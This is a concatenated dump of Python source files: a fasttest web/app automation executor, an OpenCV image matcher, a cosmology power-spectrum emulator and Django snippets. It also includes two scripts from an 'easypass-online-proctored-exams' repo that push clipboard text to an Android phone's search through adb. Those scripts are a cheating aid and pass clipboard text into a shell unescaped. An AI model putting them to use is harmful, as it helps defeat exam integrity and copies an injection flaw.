:return:
'''
element = self._getElement(action)
xoffset = self._getParms(action, 1)
yoffset = self._getParms(action, 2)
DriverBaseWeb.drag_and_drop_by_offse(element, float(xoffset), float(yoffset))
def _moveByOffset(self, action):
'''
:param action:
:return:
'''
xoffset = self._getParms(action, 0)
yoffset = self._getParms(action, 1)
DriverBaseWeb.move_by_offset(float(xoffset), float(yoffset))
@check
def _moveToElement(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.move_to_element(element)
@check
def _moveToElementWithOffset(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
xoffset = self._getParms(action, 1)
yoffset = self._getParms(action, 2)
DriverBaseWeb.move_to_element_with_offset(element, float(xoffset), float(yoffset))
@check
def _sendKeys(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
text_list = []
if len(action.parms) == 2:
text_list.append(self._getParms(action, 1))
elif len(action.parms) == 3:
text_list.append(self._getParms(action, 1))
text_list.append(self._getParms(action, 2))
else:
raise TypeError('missing 1 required positional argument')
DriverBaseWeb.send_keys(element, text_list)
@check
def _clear(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
DriverBaseWeb.clear(element)
def _maxWindow(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.maximize_window()
def _minWindow(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.minimize_window()
def _fullscreenWindow(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.fullscreen_window()
def _deleteAllCookies(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.delete_all_cookies()
def _deleteCookie(self, action):
'''
:param action:
:return:
'''
key = self._getParms(action, 0)
DriverBaseWeb.delete_cookie(key)
def _addCookie(self, action):
'''
:param action:
:return:
'''
key = self._getParms(action, 0)
DriverBaseWeb.add_cookie(key)
def _switchToFrame(self, action):
'''
:param action:
:return:
'''
frame_reference = self._getParms(action)
DriverBaseWeb.switch_to_frame(frame_reference)
def _switchToDefaultContent(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.switch_to_default_content()
def _switchToParentFrame(self, action):
'''
:param action:
:return:
'''
DriverBaseWeb.switch_to_parent_frame()
def _switchToWindow(self, action):
'''
:param action:
:return:
'''
handle = self._getParms(action)
DriverBaseWeb.switch_to_window(handle)
def _setWindowSize(self, action):
'''
:param action:
:return:
'''
width = self._getParms(action, 0)
height = self._getParms(action, 0)
DriverBaseWeb.set_window_size(float(width), float(height))
def _setWindowPosition(self, action):
'''
:param action:
:return:
'''
x = self._getParms(action, 0)
y = self._getParms(action, 1)
DriverBaseWeb.set_window_position(float(x), float(y))
def _executeScript(self, action):
'''
:param action:
:return:
'''
endTime = datetime.datetime.now() + datetime.timedelta(seconds=int(Var.time_out))
while True:
try:
js_value = self._getParms(action)
return DriverBaseWeb.execute_script(js_value)
except JavascriptException as e:
if datetime.datetime.now() >= endTime:
raise e
time.sleep(0.1)
except Exception as e:
raise e
def _matchImage(self, action):
'''
:param action:
:return:
'''
base_image = self._getParms(action, 0)
match_image = self._getParms(action, 1)
if not os.path.isfile(match_image):
raise FileNotFoundError("No such file: {}".format(match_image))
if not os.path.isfile(base_image):
raise FileNotFoundError("No such file: {}".format(base_image))
height = Var.instance.get_window_size()['height']
orc_img = OpencvUtils(base_image, match_image, height)
img_info = orc_img.extract_minutiae()
if img_info:
Var.ocrimg = img_info['ocrimg']
else:
raise Exception("Can't find image {}".format(match_image))
@check
def _saveScreenshot(self, action):
'''
:param action:
:return:
'''
if len(action.parms) == 1:
element = None
name = self._getParms(action, 0)
else:
element = self._getElement(action)
name = self._getParms(action, 1)
return DriverBaseWeb.save_screenshot(element, name)
@check
def _isSelected(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.is_selected(element)
@check
def _isDisplayed(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.is_displayed(element)
@check
def _isEnabled(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.is_enabled(element)
@check
def _getSize(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.get_size(element)
@check
def _getLocation(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.get_location(element)
@check
def _getRect(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.get_rect(element)
@check
def _getAttribute(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
attribute = self._getParms(action, 1)
return DriverBaseWeb.get_attribute(element, attribute)
@check
def _getTagName(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.get_tag_name(element)
@check
def _getCssProperty(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
css_value = self._getParms(action, 1)
return DriverBaseWeb.get_css_property(element, css_value)
def _getName(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_name()
def _getTitle(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_title()
def _getCurrentUrl(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_current_url()
def _getCurrentWindowHandle(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_current_window_handle()
def _getWindowHandles(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_window_handles()
def _getCookies(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_cookies()
def _getCookie(self, action):
'''
:param action:
:return:
'''
key = self._getParms(action)
return DriverBaseWeb.get_cookie(key)
def _getWindowPosition(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_window_position()
def _getWindowSize(self, action):
'''
:param action:
:return:
'''
return DriverBaseWeb.get_window_size()
@check
def _getText(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
return DriverBaseWeb.get_text(element)
def _getElement(self, action, index=0):
'''
:param action:
:return:
'''
parms = action.parms
if len(parms) <= index or not len(parms):
raise TypeError('missing {} required positional argument'.format(index + 1))
if isinstance(parms[index], WebElement):
element = parms[index]
elif isinstance(parms[index], str):
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms[index].strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms[index]))
key = parms[index].split('=', 1)[0].strip()
value = parms[index].split('=', 1)[-1].strip()
element = DriverBaseWeb.get_element(key, value, Var.time_out)
else:
raise TypeError('the parms type must be: WebElement or str')
if not element:
raise Exception("Can't find element: {}".format(parms[index]))
return element
def _getElements(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms.strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms))
key = parms.strip().split('=', 1)[0]
value = parms.strip().split('=', 1)[-1]
elements = DriverBaseWeb.get_elements(key, value, Var.time_out)
if not elements:
raise Exception("Can't find elements: {}".format(parms))
return elements
def _isExist(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms.strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms))
key = parms.strip().split('=', 1)[0]
value = parms.strip().split('=', 1)[-1]
elements = DriverBaseWeb.get_elements(key, value, Var.time_out)
return bool(elements)
def _isNotExist(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if not re.match(r'^(id|name|class|tag_name|link_text|partial_link_text|xpath|css_selector)\s*=.+',
parms.strip(), re.I):
raise TypeError('input parameter format error:{}'.format(parms))
key = parms.strip().split('=', 1)[0]
value = parms.strip().split('=', 1)[-1]
elements = DriverBaseWeb.get_elements(key, value, 0)
return not bool(elements) |
Hanlen520/fasttest | fasttest/runner/action_executor_app.py | <reponame>Hanlen520/fasttest<filename>fasttest/runner/action_executor_app.py<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from fasttest.common import Var
from fasttest.drivers.driver_base_app import DriverBaseApp
from fasttest.utils.opcv_utils import OpencvUtils
from fasttest.runner.action_executor_base import ActionExecutorBase
class ActionExecutorApp(ActionExecutorBase):
def _installApp(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
DriverBaseApp.install_app(parms)
def _uninstallApp(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
DriverBaseApp.uninstall_app(parms)
def _launchApp(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
DriverBaseApp.launch_app(parms)
def _closeApp(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0, ignore=True)
if parms:
DriverBaseApp.close_app(parms)
else:
package = Var.desired_caps.package if Var.desired_caps.package else Var.desired_caps.appPackage
DriverBaseApp.close_app(package)
def _tap(self, action):
'''
:param action:
:return:
'''
parms_x = self._getParms(action, 0)
parms_y = self._getParms(action, 1)
DriverBaseApp.tap(parms_x, parms_y)
def _doubleTap(self, action):
'''
:param action:
:return:
'''
parms_x = self._getParms(action, 0)
parms_y = self._getParms(action, 1)
DriverBaseApp.double_tap(parms_x, parms_y)
def _press(self, action):
'''
:param action:
:return:
'''
parms_x = self._getParms(action, 0)
parms_y = self._getParms(action, 1)
parms_s = self._getParms(action, 2, ignore=True)
if not parms_s:
DriverBaseApp.press(parms_x, parms_y)
else:
DriverBaseApp.press(parms_x, parms_y, parms_s)
def _goBack(self, action):
'''
:param action:
:return:
'''
DriverBaseApp.adb_shell('shell input keyevent 4')
def _adb(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
DriverBaseApp.adb_shell(parms)
def _swipe(self, action):
'''
:param action:
:return:
'''
parms_fx = self._getParms(action, 0)
parms_fy = self._getParms(action, 1, ignore=True)
parms_tx = self._getParms(action, 2, ignore=True)
parms_ty = self._getParms(action, 3, ignore=True)
parms_s = self._getParms(action, 4, ignore=True)
try:
if len(action.parms) == 1:
swipe_f = getattr(DriverBaseApp, 'swipe_{}'.format(parms_fx.lower()))
swipe_f()
elif len(action.parms) == 2:
swipe_f = getattr(DriverBaseApp, 'swipe_{}'.format(parms_fx.lower()))
swipe_f(parms_fy)
elif len(action.parms) == 4:
DriverBaseApp.swipe(parms_fx, parms_fy, parms_tx, parms_ty)
elif len(action.parms) == 5:
DriverBaseApp.swipe(parms_fx, parms_fy, parms_tx, parms_ty, parms_s)
else:
raise
except:
raise TypeError('swipe takes 1 positional argument but {} were giver'.format(len(action.step)))
def _input(self, action):
'''
:param action:
:return:
'''
text = self._getParms(action, 1)
element = self._getElement(action)
DriverBaseApp.input(element, text)
def _click(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
image_name = '{}.png'.format(action.step)
img_info = self._ocrAnalysis(image_name, parms)
if not isinstance(img_info, bool):
if img_info is not None:
Var.ocrimg = img_info['ocrimg']
x = img_info['x']
y = img_info['y']
DriverBaseApp.tap(x, y)
else:
raise Exception("Can't find element {}".format(parms))
else:
element = self._getElement(action)
DriverBaseApp.click(element)
def _check(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
image_name = '{}.png'.format(action.step)
img_info = self._ocrAnalysis(image_name, parms)
if not isinstance(img_info, bool):
if img_info is not None:
Var.ocrimg = img_info['ocrimg']
else:
raise Exception("Can't find element {}".format(parms))
else:
self._getElement(action)
def _ifiOS(self, action):
'''
:param action:
:return:
'''
if Var.desired_caps.platformName.lower() == 'ios':
return True
return False
def _ifAndroid(self, action):
'''
:param action:
:return:
'''
if Var.desired_caps.platformName.lower() == 'android':
return True
return False
def _getText(self, action):
'''
:param action:
:return:
'''
element = self._getElement(action)
text = DriverBaseApp.get_text(element)
return text
def _getElement(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
if Var.driver == 'appium':
from appium.webdriver import WebElement
if Var.driver == 'macaca':
from macaca.webdriver import WebElement
if isinstance(parms, WebElement):
element = parms
else:
element = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval)
if not element:
raise Exception("Can't find element {}".format(parms))
return element
def _getElements(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval,
not_processing=True)
if not elements:
raise Exception("Can't find element {}".format(parms))
return elements
def _isExist(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
image_name = '{}.png'.format(action.step)
img_info = self._ocrAnalysis(image_name, parms)
result = True
if not isinstance(img_info, bool):
if img_info is not None:
Var.ocrimg = img_info['ocrimg']
else:
result = False
else:
elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=Var.time_out, interval=Var.interval, not_processing=True)
result = bool(elements)
return result
def _isNotExist(self, action):
'''
:param action:
:return:
'''
parms = self._getParms(action, 0)
image_name = '{}.png'.format(action.step)
img_info = self._ocrAnalysis(image_name, parms)
result = False
if not isinstance(img_info, bool):
if img_info is not None:
Var.ocrimg = img_info['ocrimg']
result = True
else:
elements = DriverBaseApp.find_elements_by_key(key=parms, timeout=0, interval=Var.interval, not_processing=True)
result = bool(elements)
return not result
def _ocrAnalysis(self,image_name, match_image):
'''
:param image_name:
:param match_image:
:return:
'''
try:
if not isinstance(match_image, str):
return False
if not os.path.isfile(match_image):
return False
image_dir = os.path.join(Var.snapshot_dir, 'screenshot')
if not os.path.exists(image_dir):
os.makedirs(image_dir)
base_image = os.path.join(image_dir, '{}'.format(image_name))
Var.instance.save_screenshot(base_image)
height = Var.instance.get_window_size()['height']
orcimg = OpencvUtils(base_image, match_image, height)
img_info = orcimg.extract_minutiae()
if img_info:
return img_info
else:
return None
except:
return False |
Hanlen520/fasttest | fasttest/utils/opcv_utils.py | <gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
try:
import cv2
except:
pass
class OpencvUtils(object):
def __init__(self,baseimage, matchimage, height):
self.baseimage = baseimage
self.matchimage = matchimage
self.height = height
self.iszoom = False
def extract_minutiae(self):
"""
提取特征点
:return:
"""
if os.path.exists(self.matchimage):
self.baseimage = cv2.imread(self.baseimage)
# self.baseimage = cv2.resize(self.baseimage, dsize=(int(self.baseimage.shape[1] / 2), int(self.baseimage.shape[0] / 2)))
self.matchimage = cv2.imread(self.matchimage)
view_height = self.height
image_height = self.baseimage.shape[0]
if view_height * 2 == image_height:
self.iszoom = True
else:
raise FileExistsError(self.matchimage)
# 创建一个SURF对象
surf = cv2.xfeatures2d.SURF_create(1000)
# SIFT对象会使用Hessian算法检测关键点,并且对每个关键点周围的区域计算特征向量。该函数返回关键点的信息和描述符
keypoints1, descriptor1 = surf.detectAndCompute(self.baseimage, None)
keypoints2, descriptor2 = surf.detectAndCompute(self.matchimage, None)
if descriptor2 is None:
return None
# 特征点匹配
matcher = cv2.FlannBasedMatcher()
matchePoints = matcher.match(descriptor1, descriptor2)
# #提取强匹配特征点
minMatch = 1
maxMatch = 0
for i in range(len(matchePoints)):
if minMatch > matchePoints[i].distance:
minMatch = matchePoints[i].distance
if maxMatch < matchePoints[i].distance:
maxMatch = matchePoints[i].distance
if minMatch > 0.2:
return None
# #获取排列在前边的几个最优匹配结果
DMatch = None
MatchePoints = []
for i in range(len(matchePoints)):
if matchePoints[i].distance == minMatch:
try:
keypoint = keypoints1[matchePoints[i].queryIdx]
x, y = keypoint.pt
if self.iszoom:
x = x / 2.0
y = y / 2.0
keypoints1 = [keypoint]
dmatch = matchePoints[i]
dmatch.queryIdx = 0
MatchePoints.append(dmatch)
except:
continue
# 绘制最优匹配点
outImg = None
outImg = cv2.drawMatches(self.baseimage, keypoints1, self.matchimage, keypoints2, MatchePoints, outImg, matchColor=(0, 255, 0),
flags=cv2.DRAW_MATCHES_FLAGS_DEFAULT)
# cv2.imwrite("outimg.png", outImg)
matchinfo = {
'x':int(x),
'y':int(y),
'ocrimg':outImg
}
return matchinfo
|
Hanlen520/fasttest | fasttest/runner/case_analysis.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import sys
import traceback
from fasttest.common import Var
from fasttest.runner.action_analysis import ActionAnalysis
class CaseAnalysis(object):
def __init__(self):
self.action_nalysis = ActionAnalysis()
self.testcase_steps = []
self.is_run = None
self.timeout = 10
def iteration(self, steps, style='', common={}, iterating_var=None):
'''
@param steps:
@param style: 控制结果报告中每句case的缩进
@param common: call 调用时需要的参数
@param iterating_var: for 迭代对象
@return:
'''
if isinstance(steps, list):
for step in steps:
if isinstance(step, str):
self.case_executor(step, style, common, iterating_var)
if step.startswith('break'):
return 'break'
elif isinstance(step, dict):
result = self.iteration(step, style, common, iterating_var)
if result == 'break':
return 'break'
elif isinstance(steps, dict):
for key, values in steps.items():
if key.startswith('while'):
while self.case_executor(key, style, common, iterating_var):
result = self.iteration(values, f'{style} ', common, iterating_var)
if result == 'break':
break
elif key.startswith('if') or key.startswith('elif') or key.startswith('else'):
if self.case_executor(key, style, common, iterating_var):
result = self.iteration(values, f'{style} ', common, iterating_var)
if result == 'break':
return 'break'
break # 判断下执行完毕,跳出循环
elif re.match('for\s+(\$\{\w+\})\s+in\s+(\S+)', key):
parms = self.case_executor(key, style, common, iterating_var)
for f in parms['value']:
iterating_var = {parms['key']: f}
result = self.iteration(values, f'{style} ', common, iterating_var)
if result == 'break':
break
else:
raise SyntaxError('- {}:'.format(key))
def case_executor(self, step, style, common, iterating_var):
# call 需要全局变量判断是否是debug模式
if step.strip().endswith('--Debug') or step.strip().endswith('--debug') or Var.is_debug:
Var.is_debug = True
while True:
try:
if self.is_run is False:
print(step)
out = input('>')
elif not (step.strip().endswith('--Debug') or step.strip().endswith('--debug')):
self.is_run = True
result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
return result
else:
print(step)
out = input('>')
if not len(out):
self.is_run = False
continue
elif out.lower() == 'r':
# run
self.is_run = True
result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
return result
elif out.lower() == 'c':
# continue
self.is_run = False
break
elif out.lower() == 'n':
# next
self.is_run = False
result = self.action_nalysis.action_analysis(self.rstrip_step(step), style, common, iterating_var)
return result
elif out.lower() == 'q':
# quit
sys.exit()
else:
# runtime
self.is_run = False
self.timeout = Var.time_out
Var.time_out = 0.5
self.action_nalysis.action_analysis(out, style, common, iterating_var)
Var.time_out = self.timeout
continue
except Exception as e:
Var.time_out = self.timeout
self.is_run = False
traceback.print_exc()
continue
else:
result = self.action_nalysis.action_analysis(step, style, common, iterating_var)
return result
def rstrip_step(self, step):
if step.strip().endswith('--Debug') or step.strip().endswith('--debug'):
return step.strip()[:-7].strip()
return step |
tmcclintock/Pmesh_emulator | pmesh_emulator/_data_manipulation.py | <gh_stars>0
"""
This file is for reading in the simulation data and saving it into a convenient format. It should not be used by the user. If you are reading this, then disregard. It will do nothing unless you are running locally (Author is <NAME>) on my laptop.
"""
import numpy as np
Nboxes = 122
Nsnaps = 30
sf = np.linspace(0.02, 1.0, Nsnaps)
scale_factors = [0.0200, 0.0538, 0.0876, 0.1214, 0.1552]
#Input file path
inpath = "pmesh_test/Box_{box:03d}/powerspec-debug_{scale_factor:0.4f}.txt"
k, _, _ = np.loadtxt(inpath.format(box=0, scale_factor=0.02), unpack=True)
#NOTE! the first k value is 0, and p = 0. This breaks the emulator,
#so we will chop that point off.
k = k[1:]
np.save("k", k)
Nk = k.size
#The emulator interpolates whole cosmologies at once
data = np.zeros((Nboxes, Nk*Nsnaps))
print("k shape {kshape}, p shape {pshape}".format(kshape=k.shape,
pshape=data.shape))
for box in range(0, 122):
for i, s in enumerate(sf):
offset = i*Nk
_, p, _ = np.loadtxt(inpath.format(box=box, scale_factor=s), \
unpack=True)
#Chop off the k=0 point (the first point)
p = p[1:]
data[box, offset: offset+Nk] = p
print("Done with Box_{box:03d}".format(box=box))
np.save("pkz_data_Nsim_x_NkNz", data)
|
tmcclintock/Pmesh_emulator | pmesh_emulator/pmesh_emulator.py | import copy
import numpy as np
import george
from george.kernels import ExpSquaredKernel, Matern52Kernel, \
ExpKernel, RationalQuadraticKernel, Matern32Kernel
import scipy.optimize as op
#Assert statements to guarantee the linter doesn't complain
assert ExpSquaredKernel
assert Matern52Kernel
assert ExpKernel
assert Matern32Kernel
assert RationalQuadraticKernel
class _pmesh_emulator(object):
"""
An emulator for particle mesh simulations. The emulator is trained
on a set of input power spectra at given locations in cosmological
parameter space. The power spectra are evaluated over a set of
redshifts and wavenumbers (h/Mpc com.).
Args:
parameters (array-like): locations in parameter space
of the input power spectra.
redshifts (float array-like): list of redshifts.
Can be a single number.
k (array-like): wavenumbers of the input power spectra.
power_spectra (array-like): 2D array of power spectra
evaluated at each location in parameter space.
"""
def __init__(self, parameters, redshifts, k, power_spectra,
number_of_principle_components=6, kernel=None):
parameters = np.asarray(parameters)
redshifts = np.asarray(redshifts)
k = np.asarray(k)
power_spectra = np.asarray(power_spectra)
if parameters.ndim != 2:
raise Exception("Parameters must be 2D array.")
if power_spectra.ndim != 2:
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
if len(parameters) != len(power_spectra):
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
if len(redshifts)*len(k) != len(power_spectra[0]):
raise Exception("Power spectra must be a 2D array of dimensions "+
"N_parameters x (N_k*N_z).")
self.parameters = parameters
self.redshifts = redshifts
self.k = k
self.power_spectra = power_spectra
self.Npars = len(self.parameters[0])
self.NPC = number_of_principle_components
metric_guess = np.std(self.parameters, 0)
if kernel is None:
kernel = 1.*ExpSquaredKernel(metric=metric_guess, ndim=self.Npars)
self.kernel = kernel
def train(self):
"""Train the emulator.
Args:
None
Return:
None
"""
zs = self.redshifts
k = self.k
p = self.power_spectra
k2p = copy.deepcopy(p)
Nk = len(k)
Nz = len(zs)
#Multiply each P(k) by k^2, but note the shapes
#of the power spectra array we have to deal with
for i in range(Nz):
lo = i*Nk
hi = (i+1)*Nk
k2p[:, lo:hi] *= k**2
#Take the log -- this reduces the dynamic range
lnk2p = np.log(k2p)
#Remove the mean and make it unit variance in each k bin
lnk2p_mean = np.mean(lnk2p)
lnk2p_std = np.std(lnk2p, 0)
lnk2p = (lnk2p - lnk2p_mean)/lnk2p_std
#Save what we have now
self.lnk2p = lnk2p
self.lnk2p_mean = lnk2p_mean
self.lnk2p_std = lnk2p_std
#Do SVD to pull out principle components
u,s,v = np.linalg.svd(lnk2p, 0) #Do the PCA
s = np.diag(s)
N = len(s)
P = np.dot(v.T, s)/np.sqrt(N)
Npc = self.NPC #number of principle components
phis = P.T[:Npc]
ws = np.sqrt(N) * u.T[:Npc]
#Save the weights and PCs
self.ws = ws
self.phis = phis
#Create the GPs and save them
gplist = []
for i in range(Npc):
ws = self.ws[i, :]
kern = copy.deepcopy(self.kernel)
gp = george.GP(kernel=kern, fit_kernel=True, mean=np.mean(ws))
gp.compute(self.parameters)
gplist.append(gp)
continue
self.gplist = gplist
#Train the GPs
for i, gp in enumerate(self.gplist):
ws = self.ws[i, :]
def nll(p):
gp.set_parameter_vector(p)
ll = gp.log_likelihood(ws, quiet=True)
return -ll if np.isfinite(ll) else 1e25
def grad_nll(p):
gp.set_parameter_vector(p)
return -gp.grad_log_likelihood(ws, quiet=True)
p0 = gp.get_parameter_vector()
result = op.minimize(nll, p0, jac=grad_nll)
gp.set_parameter_vector(result.x)
continue
self.trained=True
return
def predict(self, params):
"""Predict the power spectrum at a set of cosmological parameters.
Args:
params (float or array-like): parameters of the requested
power spectra
Returns:
(array-like): length (Nz x Nk) 1D array with the predicted
power spectra for the requested cosmology
"""
if not self.trained:
raise Exception("Need to train the emulator first.")
params = np.atleast_1d(params)
if params.ndim > 1:
raise Exception("'params' must be a single point in parameter "+
"space; a 1D array at most.")
if len(params) != self.Npars:
raise Exception("length of 'params' does not match training "+\
"parameters.")
#For higher dimensional trianing data, george requires a 2D array...
if len(params) > 1:
params = np.atleast_2d(params)
#Loop over d GPs and predict weights
wp = np.array([gp.predict(ws, params)[0] for ws, gp in\
zip(self.ws, self.gplist)])
#Multiply by the principle components to get predicted lnk2p
lnk2p_pred = wp[0]*self.phis[0]
for i in range(1, self.NPC):
lnk2p_pred += wp[i]*self.phis[i]
#Multiply on the stddev and add on the mean
lnk2p_pred = lnk2p_pred *self.lnk2p_std + self.lnk2p_mean
k2p_pred = np.exp(lnk2p_pred)
k = self.k
zs = self.redshifts
Nk = len(k)
Nz = len(zs)
P_pred = k2p_pred
#Multiply each P(k) by k^2, but note the shapes
#of the power spectra array we have to deal with
for i in range(Nz):
lo = i*Nk
hi = (i+1)*Nk
P_pred[lo:hi] /= k**2
return P_pred
class pmesh_emulator(object):
def __init__(self, excluded_indices=None, number_of_principle_components=6):
import os, inspect
data_path = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))+"/"
self.number_of_principle_components = number_of_principle_components
self.params = np.loadtxt(data_path+"training_points.txt")
self.sf = np.linspace(0.02, 1.0, 30) #30 Snapshots
self.zs = 1./self.sf - 1.
self.k = np.load(data_path+"k.npy")
self.pkz = np.load(data_path+"pkz_data_Nsim_x_NkNz.npy")
if np.any(self.pkz <= 0):
raise Exception("problem: negative or 0 P(k,z)")
if np.any(np.isnan(self.pkz)):
raise Exception("problem: nan value in P(k,z)")
if np.any(np.isinf(self.pkz)):
raise Exception("problem: inf value in P(k,z)")
if excluded_indices is not None:
inds = np.arange(len(self.params))
self.excluded_indices=excluded_indices
self.excluded_params = self.params[excluded_indices]
self.excluded_pkz = self.pkz[excluded_indices]
self.params = np.delete(self.params, excluded_indices, axis=0)
self.pkz = np.delete(self.pkz, excluded_indices, axis=0)
self._emu = _pmesh_emulator(self.params, self.zs,
self.k, self.pkz,
number_of_principle_components)
self._emu.train()
def predict(self, params):
return self._emu.predict(params)
if __name__ == "__main__":
emu = pmesh_emulator()
|
tmcclintock/Pmesh_emulator | pmesh_emulator/__init__.py | """Emulator for particle mesh sims.
"""
from .pmesh_emulator import pmesh_emulator
assert pmesh_emulator #A hack to get pyflakes to not complain
__version__ = "0.1.0"
__author__ = "<NAME>"
__email__ = "<EMAIL>"
|
tmcclintock/Pmesh_emulator | setup.py | from setuptools import setup
dist = setup(name="Pmesh_emulator",
author="<NAME>",
author_email="<EMAIL>",
description="Framework for emulating particle mesh simulations.",
license="MIT",
url="https://github.com/tmcclintock/Pmesh_emulator",
include_package_data = True,
packages=['pmesh_emulator'],
long_description=open("README.md").read())
|
akhileshkoti/easypass-online-proctored-exams | automate_search.pyw | <filename>automate_search.pyw
from ppadb.client import Client
import clipboard as c
import time
client=Client(host="127.0.0.1",port=5037)
'''print("------------Starting Server------------")
print("Connecting to client",end='')
for i in range(3):
print('.',end='')
time.sleep(1)'''
devices=client.devices()
device=devices[0]
#print('Connected\n')
while(True):
devices=client.devices()
device=devices[0]
# print('Connected\n')
new=text=''
while(True):
text=c.paste()
text=text.split()
text='%s'.join(text)
if(new!=text):
device.shell('input keyevent 84')
time.sleep(2)
device.shell('input text '+text)
#print(text)
device.shell('input keyevent 28')
device.shell('input keyevent 66')
new=text
|
akhileshkoti/easypass-online-proctored-exams | automate_android_search.py | <reponame>akhileshkoti/easypass-online-proctored-exams
from ppadb.client import Client
import clipboard as c
import time
client=Client(host="127.0.0.1",port=5037)
print("------------Starting Server------------")
print("Connecting to client",end='')
for i in range(3):
print('.',end='')
time.sleep(1)
devices=client.devices()
device=devices[0]
print('Connected\n')
new=text=''
while(True):
text=c.paste()
text=text.split()
text='%s'.join(text)
if(new!=text):
device.shell('input keyevent 84')
time.sleep(2)
device.shell('input text '+text)
print(text)
device.shell('input keyevent 28')
device.shell('input keyevent 66')
new=text
|
maenette/django | tests/postgres_tests/test_signals.py | from django.db import connection
from . import PostgreSQLTestCase
try:
from django.contrib.postgres.signals import get_hstore_oids, get_citext_oids
except ImportError:
pass # pyscogp2 isn't installed.
class OIDTests(PostgreSQLTestCase):
def assertOIDs(self, oids):
self.assertIsInstance(oids, tuple)
self.assertGreater(len(oids), 0)
self.assertTrue(all(isinstance(oid, int) for oid in oids))
def test_hstore_cache(self):
with self.assertNumQueries(0):
get_hstore_oids(connection.alias)
def test_citext_cache(self):
with self.assertNumQueries(0):
get_citext_oids(connection.alias)
def test_hstore_values(self):
oids, array_oids = get_hstore_oids(connection.alias)
self.assertOIDs(oids)
self.assertOIDs(array_oids)
def test_citext_values(self):
oids = get_citext_oids(connection.alias)
self.assertOIDs(oids)
|
maenette/django | django/urls/conf.py | <filename>django/urls/conf.py<gh_stars>1-10
"""Functions for use in URLsconfs."""
from importlib import import_module
from django.core.exceptions import ImproperlyConfigured
from .resolvers import LocaleRegexURLResolver
def include(arg, namespace=None):
app_name = None
if isinstance(arg, tuple):
# Callable returning a namespace hint.
try:
urlconf_module, app_name = arg
except ValueError:
if namespace:
raise ImproperlyConfigured(
'Cannot override the namespace for a dynamic module that '
'provides a namespace.'
)
raise ImproperlyConfigured(
'Passing a %d-tuple to include() is not supported. Pass a '
'2-tuple containing the list of patterns and app_name, and '
'provide the namespace argument to include() instead.' % len(arg)
)
else:
# No namespace hint - use manually provided namespace.
urlconf_module = arg
if isinstance(urlconf_module, str):
urlconf_module = import_module(urlconf_module)
patterns = getattr(urlconf_module, 'urlpatterns', urlconf_module)
app_name = getattr(urlconf_module, 'app_name', app_name)
if namespace and not app_name:
raise ImproperlyConfigured(
'Specifying a namespace in include() without providing an app_name '
'is not supported. Set the app_name attribute in the included '
'module, or pass a 2-tuple containing the list of patterns and '
'app_name instead.',
)
namespace = namespace or app_name
# Make sure the patterns can be iterated through (without this, some
# testcases will break).
if isinstance(patterns, (list, tuple)):
for url_pattern in patterns:
if isinstance(url_pattern, LocaleRegexURLResolver):
raise ImproperlyConfigured(
'Using i18n_patterns in an included URLconf is not allowed.'
)
